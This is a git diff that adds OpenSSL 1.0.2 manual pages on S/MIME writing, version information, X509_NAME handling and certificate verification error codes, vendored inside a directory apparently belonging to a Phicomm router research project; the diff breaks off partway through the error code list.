+L<SMIME_read_PKCS7(3)|SMIME_read_PKCS7(3)>, L<PKCS7_sign(3)|PKCS7_sign(3)>,
+L<PKCS7_verify(3)|PKCS7_verify(3)>, L<PKCS7_encrypt(3)|PKCS7_encrypt(3)>
+L<PKCS7_decrypt(3)|PKCS7_decrypt(3)>
+
+=head1 HISTORY
+
+SMIME_read_PKCS7() was added to OpenSSL 0.9.5
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_write_CMS.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_write_CMS.pod
new file mode 100644
index 0000000..04bedfb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_write_CMS.pod
@@ -0,0 +1,64 @@
+=pod
+
+=head1 NAME
+
+ SMIME_write_CMS - convert CMS structure to S/MIME format.
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ int SMIME_write_CMS(BIO *out, CMS_ContentInfo *cms, BIO *data, int flags);
+
+=head1 DESCRIPTION
+
+SMIME_write_CMS() adds the appropriate MIME headers to a CMS
+structure to produce an S/MIME message.
+
+B<out> is the BIO to write the data to. B<cms> is the appropriate
+B<CMS_ContentInfo> structure. If streaming is enabled then the content must be
+supplied in the B<data> argument. B<flags> is an optional set of flags.
+
+=head1 NOTES
+
+The following flags can be passed in the B<flags> parameter.
+
+If B<CMS_DETACHED> is set then cleartext signing will be used, this option only
+makes sense for SignedData where B<CMS_DETACHED> is also set when CMS_sign() is
+called.
+
+If the B<CMS_TEXT> flag is set MIME headers for type B<text/plain> are added to
+the content, this only makes sense if B<CMS_DETACHED> is also set.
+
+If the B<CMS_STREAM> flag is set streaming is performed. This flag should only
+be set if B<CMS_STREAM> was also set in the previous call to a CMS_ContentInfo
+creation function.
+
+If cleartext signing is being used and B<CMS_STREAM> not set then the data must
+be read twice: once to compute the signature in CMS_sign() and once to output
+the S/MIME message.
+
+If streaming is performed the content is output in BER format using indefinite
+length constructed encoding except in the case of signed data with detached
+content where the content is absent and DER format is used.
+
+=head1 BUGS
+
+SMIME_write_CMS() always base64 encodes CMS structures, there should be an
+option to disable this.
+
+=head1 RETURN VALUES
+
+SMIME_write_CMS() returns 1 for success or 0 for failure.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_sign(3)|CMS_sign(3)>,
+L<CMS_verify(3)|CMS_verify(3)>, L<CMS_encrypt(3)|CMS_encrypt(3)>
+L<CMS_decrypt(3)|CMS_decrypt(3)>
+
+=head1 HISTORY
+
+SMIME_write_CMS() was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_write_PKCS7.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_write_PKCS7.pod
new file mode 100644
index 0000000..ca6bd02
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SMIME_write_PKCS7.pod
@@ -0,0 +1,65 @@
+=pod
+
+=head1 NAME
+
+SMIME_write_PKCS7 - convert PKCS#7 structure to S/MIME format.
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs7.h>
+
+ int SMIME_write_PKCS7(BIO *out, PKCS7 *p7, BIO *data, int flags);
+
+=head1 DESCRIPTION
+
+SMIME_write_PKCS7() adds the appropriate MIME headers to a PKCS#7
+structure to produce an S/MIME message.
+
+B<out> is the BIO to write the data to. B<p7> is the appropriate B<PKCS7>
+structure. If streaming is enabled then the content must be supplied in the
+B<data> argument. B<flags> is an optional set of flags.
+
+=head1 NOTES
+
+The following flags can be passed in the B<flags> parameter.
+
+If B<PKCS7_DETACHED> is set then cleartext signing will be used,
+this option only makes sense for signedData where B<PKCS7_DETACHED>
+is also set when PKCS7_sign() is also called.
+
+If the B<PKCS7_TEXT> flag is set MIME headers for type B<text/plain>
+are added to the content, this only makes sense if B<PKCS7_DETACHED>
+is also set.
+
+If the B<PKCS7_STREAM> flag is set streaming is performed. This flag should
+only be set if B<PKCS7_STREAM> was also set in the previous call to
+PKCS7_sign() or B<PKCS7_encrypt()>.
+
+If cleartext signing is being used and B<PKCS7_STREAM> not set then
+the data must be read twice: once to compute the signature in PKCS7_sign()
+and once to output the S/MIME message.
+
+If streaming is performed the content is output in BER format using indefinite
+length constructuted encoding except in the case of signed data with detached
+content where the content is absent and DER format is used.
+
+=head1 BUGS
+
+SMIME_write_PKCS7() always base64 encodes PKCS#7 structures, there
+should be an option to disable this.
+
+=head1 RETURN VALUES
+
+SMIME_write_PKCS7() returns 1 for success or 0 for failure.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<PKCS7_sign(3)|PKCS7_sign(3)>,
+L<PKCS7_verify(3)|PKCS7_verify(3)>, L<PKCS7_encrypt(3)|PKCS7_encrypt(3)>
+L<PKCS7_decrypt(3)|PKCS7_decrypt(3)>
+
+=head1 HISTORY
+
+SMIME_write_PKCS7() was added to OpenSSL 0.9.5
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SSLeay_version.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SSLeay_version.pod
new file mode 100644
index 0000000..1500c2a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/SSLeay_version.pod
@@ -0,0 +1,74 @@
+=pod
+
+=head1 NAME
+
+SSLeay_version - retrieve version/build information about OpenSSL library
+
+=head1 SYNOPSIS
+
+ #include <openssl/crypto.h>
+
+ const char *SSLeay_version(int type);
+
+=head1 DESCRIPTION
+
+SSLeay_version() returns a pointer to a constant string describing the
+version of the OpenSSL library or giving information about the library
+build.
+
+The following B<type> values are supported:
+
+=over 4
+
+=item SSLEAY_VERSION
+
+The version of the OpenSSL library including the release date.
+
+=item SSLEAY_CFLAGS
+
+The compiler flags set for the compilation process in the form
+"compiler: ..."  if available or "compiler: information not available"
+otherwise.
+
+=item SSLEAY_BUILT_ON
+
+The date of the build process in the form "built on: ..." if available
+or "built on: date not available" otherwise.
+
+=item SSLEAY_PLATFORM
+
+The "Configure" target of the library build in the form "platform: ..."
+if available or "platform: information not available" otherwise.
+
+=item SSLEAY_DIR
+
+The "OPENSSLDIR" setting of the library build in the form "OPENSSLDIR: "...""
+if available or "OPENSSLDIR: N/A" otherwise.
+
+=back
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item "not available"
+
+An invalid value for B<type> was given.
+
+=item Pointer to constant string
+
+Textual description.
+
+=back
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>
+
+=head1 HISTORY
+
+B<SSLEAY_DIR> was added in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_ENTRY_get_object.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_ENTRY_get_object.pod
new file mode 100644
index 0000000..4716e7e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_ENTRY_get_object.pod
@@ -0,0 +1,74 @@
+=pod
+
+=head1 NAME
+
+X509_NAME_ENTRY_get_object, X509_NAME_ENTRY_get_data,
+X509_NAME_ENTRY_set_object, X509_NAME_ENTRY_set_data,
+X509_NAME_ENTRY_create_by_txt, X509_NAME_ENTRY_create_by_NID,
+X509_NAME_ENTRY_create_by_OBJ - X509_NAME_ENTRY utility functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ ASN1_OBJECT * X509_NAME_ENTRY_get_object(X509_NAME_ENTRY *ne);
+ ASN1_STRING * X509_NAME_ENTRY_get_data(X509_NAME_ENTRY *ne);
+
+ int X509_NAME_ENTRY_set_object(X509_NAME_ENTRY *ne, ASN1_OBJECT *obj);
+ int X509_NAME_ENTRY_set_data(X509_NAME_ENTRY *ne, int type, const unsigned char *bytes, int len);
+
+ X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_txt(X509_NAME_ENTRY **ne, const char *field, int type, const unsigned char *bytes, int len);
+ X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_NID(X509_NAME_ENTRY **ne, int nid, int type,unsigned char *bytes, int len);
+ X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_OBJ(X509_NAME_ENTRY **ne, ASN1_OBJECT *obj, int type, const unsigned char *bytes, int len);
+
+=head1 DESCRIPTION
+
+X509_NAME_ENTRY_get_object() retrieves the field name of B<ne> in
+and B<ASN1_OBJECT> structure.
+
+X509_NAME_ENTRY_get_data() retrieves the field value of B<ne> in
+and B<ASN1_STRING> structure.
+
+X509_NAME_ENTRY_set_object() sets the field name of B<ne> to B<obj>.
+
+X509_NAME_ENTRY_set_data() sets the field value of B<ne> to string type
+B<type> and value determined by B<bytes> and B<len>.
+
+X509_NAME_ENTRY_create_by_txt(), X509_NAME_ENTRY_create_by_NID()
+and X509_NAME_ENTRY_create_by_OBJ() create and return an 
+B<X509_NAME_ENTRY> structure.
+
+=head1 NOTES
+
+X509_NAME_ENTRY_get_object() and X509_NAME_ENTRY_get_data() can be
+used to examine an B<X509_NAME_ENTRY> function as returned by 
+X509_NAME_get_entry() for example.
+
+X509_NAME_ENTRY_create_by_txt(), X509_NAME_ENTRY_create_by_NID(),
+and X509_NAME_ENTRY_create_by_OBJ() create and return an 
+
+X509_NAME_ENTRY_create_by_txt(), X509_NAME_ENTRY_create_by_OBJ(),
+X509_NAME_ENTRY_create_by_NID() and X509_NAME_ENTRY_set_data()
+are seldom used in practice because B<X509_NAME_ENTRY> structures
+are almost always part of B<X509_NAME> structures and the
+corresponding B<X509_NAME> functions are typically used to
+create and add new entries in a single operation.
+
+The arguments of these functions support similar options to the similarly
+named ones of the corresponding B<X509_NAME> functions such as
+X509_NAME_add_entry_by_txt(). So for example B<type> can be set to
+B<MBSTRING_ASC> but in the case of X509_set_data() the field name must be
+set first so the relevant field information can be looked up internally.
+
+=head1 RETURN VALUES
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<d2i_X509_NAME(3)|d2i_X509_NAME(3)>,
+L<OBJ_nid2obj(3)|OBJ_nid2obj(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_add_entry_by_txt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_add_entry_by_txt.pod
new file mode 100644
index 0000000..3bdc07f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_add_entry_by_txt.pod
@@ -0,0 +1,116 @@
+=pod
+
+=head1 NAME
+
+X509_NAME_add_entry_by_txt, X509_NAME_add_entry_by_OBJ, X509_NAME_add_entry_by_NID,
+X509_NAME_add_entry, X509_NAME_delete_entry - X509_NAME modification functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ int X509_NAME_add_entry_by_txt(X509_NAME *name, const char *field, int type, const unsigned char *bytes, int len, int loc, int set);
+
+ int X509_NAME_add_entry_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, int type, unsigned char *bytes, int len, int loc, int set);
+
+ int X509_NAME_add_entry_by_NID(X509_NAME *name, int nid, int type, unsigned char *bytes, int len, int loc, int set);
+
+ int X509_NAME_add_entry(X509_NAME *name,X509_NAME_ENTRY *ne, int loc, int set);
+
+ X509_NAME_ENTRY *X509_NAME_delete_entry(X509_NAME *name, int loc);
+
+=head1 DESCRIPTION
+
+X509_NAME_add_entry_by_txt(), X509_NAME_add_entry_by_OBJ() and
+X509_NAME_add_entry_by_NID() add a field whose name is defined
+by a string B<field>, an object B<obj> or a NID B<nid> respectively.
+The field value to be added is in B<bytes> of length B<len>. If
+B<len> is -1 then the field length is calculated internally using
+strlen(bytes).
+
+The type of field is determined by B<type> which can either be a
+definition of the type of B<bytes> (such as B<MBSTRING_ASC>) or a
+standard ASN1 type (such as B<V_ASN1_IA5STRING>). The new entry is
+added to a position determined by B<loc> and B<set>.
+
+X509_NAME_add_entry() adds a copy of B<X509_NAME_ENTRY> structure B<ne>
+to B<name>. The new entry is added to a position determined by B<loc>
+and B<set>. Since a copy of B<ne> is added B<ne> must be freed up after
+the call.
+
+X509_NAME_delete_entry() deletes an entry from B<name> at position
+B<loc>. The deleted entry is returned and must be freed up.
+
+=head1 NOTES
+
+The use of string types such as B<MBSTRING_ASC> or B<MBSTRING_UTF8>
+is strongly recommended for the B<type> parameter. This allows the
+internal code to correctly determine the type of the field and to
+apply length checks according to the relevant standards. This is
+done using ASN1_STRING_set_by_NID().
+
+If instead an ASN1 type is used no checks are performed and the
+supplied data in B<bytes> is used directly.
+
+In X509_NAME_add_entry_by_txt() the B<field> string represents
+the field name using OBJ_txt2obj(field, 0).
+
+The B<loc> and B<set> parameters determine where a new entry should
+be added. For almost all applications B<loc> can be set to -1 and B<set>
+to 0. This adds a new entry to the end of B<name> as a single valued
+RelativeDistinguishedName (RDN).
+
+B<loc> actually determines the index where the new entry is inserted:
+if it is -1 it is appended. 
+
+B<set> determines how the new type is added. If it is zero a
+new RDN is created.
+
+If B<set> is -1 or 1 it is added to the previous or next RDN
+structure respectively. This will then be a multivalued RDN:
+since multivalues RDNs are very seldom used B<set> is almost
+always set to zero.
+
+=head1 EXAMPLES
+
+Create an B<X509_NAME> structure:
+
+"C=UK, O=Disorganized Organization, CN=Joe Bloggs"
+
+ X509_NAME *nm;
+ nm = X509_NAME_new();
+ if (nm == NULL)
+	/* Some error */
+ if (!X509_NAME_add_entry_by_txt(nm, "C", MBSTRING_ASC, 
+			"UK", -1, -1, 0))
+	/* Error */
+ if (!X509_NAME_add_entry_by_txt(nm, "O", MBSTRING_ASC,
+			"Disorganized Organization", -1, -1, 0))
+	/* Error */
+ if (!X509_NAME_add_entry_by_txt(nm, "CN", MBSTRING_ASC,
+			"Joe Bloggs", -1, -1, 0))
+	/* Error */
+
+=head1 RETURN VALUES
+
+X509_NAME_add_entry_by_txt(), X509_NAME_add_entry_by_OBJ(),
+X509_NAME_add_entry_by_NID() and X509_NAME_add_entry() return 1 for
+success of 0 if an error occurred.
+
+X509_NAME_delete_entry() returns either the deleted B<X509_NAME_ENTRY>
+structure of B<NULL> if an error occurred.
+
+=head1 BUGS
+
+B<type> can still be set to B<V_ASN1_APP_CHOOSE> to use a
+different algorithm to determine field types. Since this form does
+not understand multicharacter types, performs no length checks and
+can result in invalid field types its use is strongly discouraged.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<d2i_X509_NAME(3)|d2i_X509_NAME(3)>
+
+=head1 HISTORY
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_get_index_by_NID.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_get_index_by_NID.pod
new file mode 100644
index 0000000..c8a8128
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_get_index_by_NID.pod
@@ -0,0 +1,112 @@
+=pod
+
+=head1 NAME
+
+X509_NAME_get_index_by_NID, X509_NAME_get_index_by_OBJ, X509_NAME_get_entry,
+X509_NAME_entry_count, X509_NAME_get_text_by_NID, X509_NAME_get_text_by_OBJ -
+X509_NAME lookup and enumeration functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ int X509_NAME_get_index_by_NID(X509_NAME *name,int nid,int lastpos);
+ int X509_NAME_get_index_by_OBJ(X509_NAME *name,ASN1_OBJECT *obj, int lastpos);
+
+ int X509_NAME_entry_count(X509_NAME *name);
+ X509_NAME_ENTRY *X509_NAME_get_entry(X509_NAME *name, int loc);
+
+ int X509_NAME_get_text_by_NID(X509_NAME *name, int nid, char *buf,int len);
+ int X509_NAME_get_text_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, char *buf,int len);
+
+=head1 DESCRIPTION
+
+These functions allow an B<X509_NAME> structure to be examined. The
+B<X509_NAME> structure is the same as the B<Name> type defined in
+RFC2459 (and elsewhere) and used for example in certificate subject
+and issuer names.
+
+X509_NAME_get_index_by_NID() and X509_NAME_get_index_by_OBJ() retrieve
+the next index matching B<nid> or B<obj> after B<lastpos>. B<lastpos>
+should initially be set to -1. If there are no more entries -1 is returned.
+
+X509_NAME_entry_count() returns the total number of entries in B<name>.
+
+X509_NAME_get_entry() retrieves the B<X509_NAME_ENTRY> from B<name>
+corresponding to index B<loc>. Acceptable values for B<loc> run from
+0 to (X509_NAME_entry_count(name) - 1). The value returned is an
+internal pointer which must not be freed.
+
+X509_NAME_get_text_by_NID(), X509_NAME_get_text_by_OBJ() retrieve
+the "text" from the first entry in B<name> which matches B<nid> or
+B<obj>, if no such entry exists -1 is returned. At most B<len> bytes
+will be written and the text written to B<buf> will be null
+terminated. The length of the output string written is returned
+excluding the terminating null. If B<buf> is <NULL> then the amount
+of space needed in B<buf> (excluding the final null) is returned. 
+
+=head1 NOTES
+
+X509_NAME_get_text_by_NID() and X509_NAME_get_text_by_OBJ() are
+legacy functions which have various limitations which make them
+of minimal use in practice. They can only find the first matching
+entry and will copy the contents of the field verbatim: this can
+be highly confusing if the target is a muticharacter string type
+like a BMPString or a UTF8String.
+
+For a more general solution X509_NAME_get_index_by_NID() or
+X509_NAME_get_index_by_OBJ() should be used followed by
+X509_NAME_get_entry() on any matching indices and then the
+various B<X509_NAME_ENTRY> utility functions on the result.
+
+The list of all relevant B<NID_*> and B<OBJ_* codes> can be found in
+the source code header files E<lt>openssl/obj_mac.hE<gt> and/or
+E<lt>openssl/objects.hE<gt>.
+
+=head1 EXAMPLES
+
+Process all entries:
+
+ int i;
+ X509_NAME_ENTRY *e;
+
+ for (i = 0; i < X509_NAME_entry_count(nm); i++)
+	{
+	e = X509_NAME_get_entry(nm, i);
+	/* Do something with e */
+	}
+
+Process all commonName entries:
+
+ int loc;
+ X509_NAME_ENTRY *e;
+
+ loc = -1;
+ for (;;)
+	{
+	lastpos = X509_NAME_get_index_by_NID(nm, NID_commonName, lastpos);
+	if (lastpos == -1)
+		break;
+	e = X509_NAME_get_entry(nm, lastpos);
+	/* Do something with e */
+	}
+
+=head1 RETURN VALUES
+
+X509_NAME_get_index_by_NID() and X509_NAME_get_index_by_OBJ()
+return the index of the next matching entry or -1 if not found.
+
+X509_NAME_entry_count() returns the total number of entries.
+
+X509_NAME_get_entry() returns an B<X509_NAME> pointer to the
+requested entry or B<NULL> if the index is invalid.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<d2i_X509_NAME(3)|d2i_X509_NAME(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_print_ex.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_print_ex.pod
new file mode 100644
index 0000000..2579a5d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_NAME_print_ex.pod
@@ -0,0 +1,105 @@
+=pod
+
+=head1 NAME
+
+X509_NAME_print_ex, X509_NAME_print_ex_fp, X509_NAME_print,
+X509_NAME_oneline - X509_NAME printing routines.
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+
+ int X509_NAME_print_ex(BIO *out, X509_NAME *nm, int indent, unsigned long flags);
+ int X509_NAME_print_ex_fp(FILE *fp, X509_NAME *nm, int indent, unsigned long flags);
+ char *	X509_NAME_oneline(X509_NAME *a,char *buf,int size);
+ int X509_NAME_print(BIO *bp, X509_NAME *name, int obase);
+
+=head1 DESCRIPTION
+
+X509_NAME_print_ex() prints a human readable version of B<nm> to BIO B<out>. Each
+line (for multiline formats) is indented by B<indent> spaces. The output format
+can be extensively customised by use of the B<flags> parameter.
+
+X509_NAME_print_ex_fp() is identical to X509_NAME_print_ex() except the output is
+written to FILE pointer B<fp>.
+
+X509_NAME_oneline() prints an ASCII version of B<a> to B<buf>. At most B<size>
+bytes will be written. If B<buf> is B<NULL> then a buffer is dynamically allocated
+and returned, otherwise B<buf> is returned.
+
+X509_NAME_print() prints out B<name> to B<bp> indenting each line by B<obase> 
+characters. Multiple lines are used if the output (including indent) exceeds
+80 characters.
+
+=head1 NOTES
+
+The functions X509_NAME_oneline() and X509_NAME_print() are legacy functions which
+produce a non standard output form, they don't handle multi character fields and
+have various quirks and inconsistencies. Their use is strongly discouraged in new
+applications.
+
+Although there are a large number of possible flags for most purposes
+B<XN_FLAG_ONELINE>, B<XN_FLAG_MULTILINE> or B<XN_FLAG_RFC2253> will suffice.
+As noted on the L<ASN1_STRING_print_ex(3)|ASN1_STRING_print_ex(3)> manual page
+for UTF8 terminals the B<ASN1_STRFLGS_ESC_MSB> should be unset: so for example
+B<XN_FLAG_ONELINE & ~ASN1_STRFLGS_ESC_MSB> would be used.
+
+The complete set of the flags supported by X509_NAME_print_ex() is listed below.
+
+Several options can be ored together.
+
+The options B<XN_FLAG_SEP_COMMA_PLUS>, B<XN_FLAG_SEP_CPLUS_SPC>,
+B<XN_FLAG_SEP_SPLUS_SPC> and B<XN_FLAG_SEP_MULTILINE> determine the field separators
+to use. Two distinct separators are used between distinct RelativeDistinguishedName
+components and separate values in the same RDN for a multi-valued RDN. Multi-valued
+RDNs are currently very rare so the second separator will hardly ever be used.
+
+B<XN_FLAG_SEP_COMMA_PLUS> uses comma and plus as separators. B<XN_FLAG_SEP_CPLUS_SPC>
+uses comma and plus with spaces: this is more readable that plain comma and plus.
+B<XN_FLAG_SEP_SPLUS_SPC> uses spaced semicolon and plus. B<XN_FLAG_SEP_MULTILINE> uses
+spaced newline and plus respectively.
+
+If B<XN_FLAG_DN_REV> is set the whole DN is printed in reversed order.
+
+The fields B<XN_FLAG_FN_SN>, B<XN_FLAG_FN_LN>, B<XN_FLAG_FN_OID>,
+B<XN_FLAG_FN_NONE> determine how a field name is displayed. It will
+use the short name (e.g. CN) the long name (e.g. commonName) always
+use OID numerical form (normally OIDs are only used if the field name is not
+recognised) and no field name respectively.
+
+If B<XN_FLAG_SPC_EQ> is set then spaces will be placed around the '=' character
+separating field names and values.
+
+If B<XN_FLAG_DUMP_UNKNOWN_FIELDS> is set then the encoding of unknown fields is
+printed instead of the values.
+
+If B<XN_FLAG_FN_ALIGN> is set then field names are padded to 20 characters: this
+is only of use for multiline format.
+
+Additionally all the options supported by ASN1_STRING_print_ex() can be used to 
+control how each field value is displayed.
+
+In addition a number options can be set for commonly used formats.
+
+B<XN_FLAG_RFC2253> sets options which produce an output compatible with RFC2253 it
+is equivalent to:
+ B<ASN1_STRFLGS_RFC2253 | XN_FLAG_SEP_COMMA_PLUS | XN_FLAG_DN_REV | XN_FLAG_FN_SN | XN_FLAG_DUMP_UNKNOWN_FIELDS>
+
+
+B<XN_FLAG_ONELINE> is a more readable one line format which is the same as:
+ B<ASN1_STRFLGS_RFC2253 | ASN1_STRFLGS_ESC_QUOTE | XN_FLAG_SEP_CPLUS_SPC | XN_FLAG_SPC_EQ | XN_FLAG_FN_SN>
+
+B<XN_FLAG_MULTILINE> is a multiline format which is the same as:
+ B<ASN1_STRFLGS_ESC_CTRL | ASN1_STRFLGS_ESC_MSB | XN_FLAG_SEP_MULTILINE | XN_FLAG_SPC_EQ | XN_FLAG_FN_LN | XN_FLAG_FN_ALIGN>
+
+B<XN_FLAG_COMPAT> uses a format identical to X509_NAME_print(): in fact it calls X509_NAME_print() internally.
+
+=head1 SEE ALSO
+
+L<ASN1_STRING_print_ex(3)|ASN1_STRING_print_ex(3)>
+
+=head1 HISTORY
+
+TBA
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_get_error.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_get_error.pod
new file mode 100644
index 0000000..be00ff1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/X509_STORE_CTX_get_error.pod
@@ -0,0 +1,305 @@
+=pod
+
+=head1 NAME
+
+X509_STORE_CTX_get_error, X509_STORE_CTX_set_error, X509_STORE_CTX_get_error_depth, X509_STORE_CTX_get_current_cert, X509_STORE_CTX_get1_chain, X509_verify_cert_error_string - get or set certificate verification status information
+
+=head1 SYNOPSIS
+
+ #include <openssl/x509.h>
+ #include <openssl/x509_vfy.h>
+
+ int	X509_STORE_CTX_get_error(X509_STORE_CTX *ctx);
+ void	X509_STORE_CTX_set_error(X509_STORE_CTX *ctx,int s);
+ int	X509_STORE_CTX_get_error_depth(X509_STORE_CTX *ctx);
+ X509 *	X509_STORE_CTX_get_current_cert(X509_STORE_CTX *ctx);
+
+ STACK_OF(X509) *X509_STORE_CTX_get1_chain(X509_STORE_CTX *ctx);
+
+ const char *X509_verify_cert_error_string(long n);
+
+=head1 DESCRIPTION
+
+These functions are typically called after X509_verify_cert() has indicated
+an error or in a verification callback to determine the nature of an error.
+
+X509_STORE_CTX_get_error() returns the error code of B<ctx>, see
+the B<ERROR CODES> section for a full description of all error codes.
+
+X509_STORE_CTX_set_error() sets the error code of B<ctx> to B<s>. For example
+it might be used in a verification callback to set an error based on additional
+checks.
+
+X509_STORE_CTX_get_error_depth() returns the B<depth> of the error. This is a
+non-negative integer representing where in the certificate chain the error
+occurred. If it is zero it occurred in the end entity certificate, one if
+it is the certificate which signed the end entity certificate and so on.
+
+X509_STORE_CTX_get_current_cert() returns the certificate in B<ctx> which
+caused the error or B<NULL> if no certificate is relevant.
+
+X509_STORE_CTX_get1_chain() returns a complete validate chain if a previous
+call to X509_verify_cert() is successful. If the call to X509_verify_cert()
+is B<not> successful the returned chain may be incomplete or invalid. The
+returned chain persists after the B<ctx> structure is freed, when it is
+no longer needed it should be free up using:
+
+  sk_X509_pop_free(chain, X509_free);
+
+X509_verify_cert_error_string() returns a human readable error string for
+verification error B<n>.
+
+=head1 RETURN VALUES
+
+X509_STORE_CTX_get_error() returns B<X509_V_OK> or an error code.
+
+X509_STORE_CTX_get_error_depth() returns a non-negative error depth.
+
+X509_STORE_CTX_get_current_cert() returns the cerificate which caused the
+error or B<NULL> if no certificate is relevant to the error.
+
+X509_verify_cert_error_string() returns a human readable error string for
+verification error B<n>.
+
+=head1 ERROR CODES
+
+A list of error codes and messages is shown below.  Some of the
+error codes are defined but currently never returned: these are described as
+"unused".
+
+=over 4
+
+=item B<X509_V_OK: ok>
+
+the operation was successful.
+
+=item B<X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT: unable to get issuer certificate>
+
+the issuer certificate could not be found: this occurs if the issuer certificate
+of an untrusted certificate cannot be found.
+
+=item B<X509_V_ERR_UNABLE_TO_GET_CRL: unable to get certificate CRL>
+
+the CRL of a certificate could not be found.
+
+=item B<X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE: unable to decrypt certificate's signature>
+
+the certificate signature could not be decrypted. This means that the actual
+signature value could not be determined rather than it not matching the
+expected value, this is only meaningful for RSA keys.
+
+=item B<X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE: unable to decrypt CRL's signature>
+
+the CRL signature could not be decrypted: this means that the actual signature
+value could not be determined rather than it not matching the expected value.
+Unused.
+
+=item B<X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY: unable to decode issuer public key>
+
+the public key in the certificate SubjectPublicKeyInfo could not be read.
+
+=item B<X509_V_ERR_CERT_SIGNATURE_FAILURE: certificate signature failure>
+
+the signature of the certificate is invalid.
+
+=item B<X509_V_ERR_CRL_SIGNATURE_FAILURE: CRL signature failure>
+
+the signature of the certificate is invalid.
+
+=item B<X509_V_ERR_CERT_NOT_YET_VALID: certificate is not yet valid>
+
+the certificate is not yet valid: the notBefore date is after the current time.
+
+=item B<X509_V_ERR_CERT_HAS_EXPIRED: certificate has expired>
+
+the certificate has expired: that is the notAfter date is before the current time.
+
+=item B<X509_V_ERR_CRL_NOT_YET_VALID: CRL is not yet valid>
+
+the CRL is not yet valid.
+
+=item B<X509_V_ERR_CRL_HAS_EXPIRED: CRL has expired>
+
+the CRL has expired.
+
+=item B<X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD: format error in certificate's notBefore field>
+
+the certificate notBefore field contains an invalid time.
+
+=item B<X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD: format error in certificate's notAfter field>
+
+the certificate notAfter field contains an invalid time.
+
+=item B<X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD: format error in CRL's lastUpdate field>
+
+the CRL lastUpdate field contains an invalid time.
+
+=item B<X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD: format error in CRL's nextUpdate field>
+
+the CRL nextUpdate field contains an invalid time.
+
+=item B<X509_V_ERR_OUT_OF_MEM: out of memory>
+
+an error occurred trying to allocate memory. This should never happen.
+
+=item B<X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT: self signed certificate>
+
+the passed certificate is self signed and the same certificate cannot be found
+in the list of trusted certificates.
+
+=item B<X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN: self signed certificate in certificate chain>
+
